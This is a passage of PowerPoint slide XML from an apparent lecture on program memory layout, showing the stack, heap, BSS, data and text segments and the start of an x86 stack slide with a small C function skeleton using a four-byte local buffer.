                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>environment variables,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>passed arguments,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>return instruction pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>dynamic space             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	malloc(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	new(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Uninitialized global &amp; static vars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>named BSS by old convention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Initialized global &amp; static variables </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>machine instructions / code segments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Shape 334"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4722769" y="1757700"/>
            <a:ext cx="2050200" cy="49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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RESERVED SPACE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STACK</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RESERVED SPACE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HEAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TEXT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="Shape 335"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6841550" y="1767950"/>
            <a:ext cx="1494300" cy="4167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336" name="Shape 336"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810075" y="1775825"/>
            <a:ext cx="1793100" cy="393300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xFFFFFFFF </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>high memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Shape 337"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810075" y="6195425"/>
            <a:ext cx="1793100" cy="393300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0x00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>low memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="338" name="Shape 338"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3027175" y="1972425"/>
            <a:ext cx="1714500" cy="534900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="339" name="Shape 339"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="334" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2125069" y="3686100"/>
            <a:ext cx="2597700" cy="542700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="340" name="Shape 340"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3797900" y="4567850"/>
            <a:ext cx="904500" cy="117900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="341" name="Shape 341"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3970925" y="5338600"/>
            <a:ext cx="723600" cy="157200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="342" name="Shape 342"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387775" y="6313725"/>
            <a:ext cx="338100" cy="39300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="343" name="Shape 343"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5598925" y="2648800"/>
            <a:ext cx="0" cy="424800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="344" name="Shape 344"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751325" y="2648800"/>
            <a:ext cx="0" cy="424800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="345" name="Shape 345"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5903725" y="2648800"/>
            <a:ext cx="0" cy="424800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="346" name="Shape 346"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5606800" y="3687025"/>
            <a:ext cx="0" cy="377400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="347" name="Shape 347"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5759200" y="3687025"/>
            <a:ext cx="0" cy="377400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="348" name="Shape 348"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5911600" y="3687025"/>
            <a:ext cx="0" cy="3774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Shape 353"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>x86 Stack Details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="Shape 354"/>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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When we think about the stack, it is convenient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to view it </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inverted</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from the standard model.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int function(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>char *buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>int var1 = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>  char buf2[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  // some code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int main(int argc, char *argv[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  if(function(argv[1]) )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	  // do something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Shape 355"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941969" y="1757700"/>
            <a:ext cx="2050200" cy="4770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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
